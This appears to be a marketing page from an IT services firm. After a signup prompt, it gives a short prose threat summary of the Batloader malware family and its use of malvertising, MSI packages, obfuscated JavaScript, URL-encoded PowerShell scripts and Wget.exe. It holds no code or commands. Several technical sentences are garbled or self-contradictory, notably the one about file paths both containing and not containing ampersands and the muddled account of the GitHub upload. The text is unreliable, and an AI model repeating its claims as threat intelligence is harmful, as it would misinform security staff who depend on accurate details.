ALL YOUR IT. SIMPLIFIED.
Cybersecurity for middle market operations
Do you know what questions to ask when you're looking for an IT firm? We're here to help. Get the free guide delivered right to your inbox:
Batloader (detected by Trend Micro as Trojan.Win32.BATLOADER), is an initial access malware family that is known for using malvertising techniques and using script-based malware inside Microsoft Software Installation (MSI) packages downloaded from legitimate-looking-yet-malicious websites.
This time, Batloader malware is abusing the powershell.exe program, and uses obfuscated JavaScript files to evade detection. In our analysis of attacks using this family, we observed it abusing legitimate tools to download and deliver BATLOADER via malicious PowerShell scripts.
The malicious PowerShell script has URL encoding in place to prevent automatic decoding by online decoders, while also making it difficult for human eyes to decode it as well. The path of the file may contain alphanumeric characters and ampersands (&). However, it fails to contain them in the actual path of the file. So, it should be possible to determine the path and file name even if URL encoding is used.
At 6:45 AM on March 9th, attackers pushed a malicious Wget.bat script. The malicious PowerShell script was downloaded via legitimate Wget.exe tool from GitHub by the attackers who uploaded it as a cloud-based service. The payload of this script is a BATLOADER installer which downloads and executes two external BATLOADER scripts that were previously written by intruders.
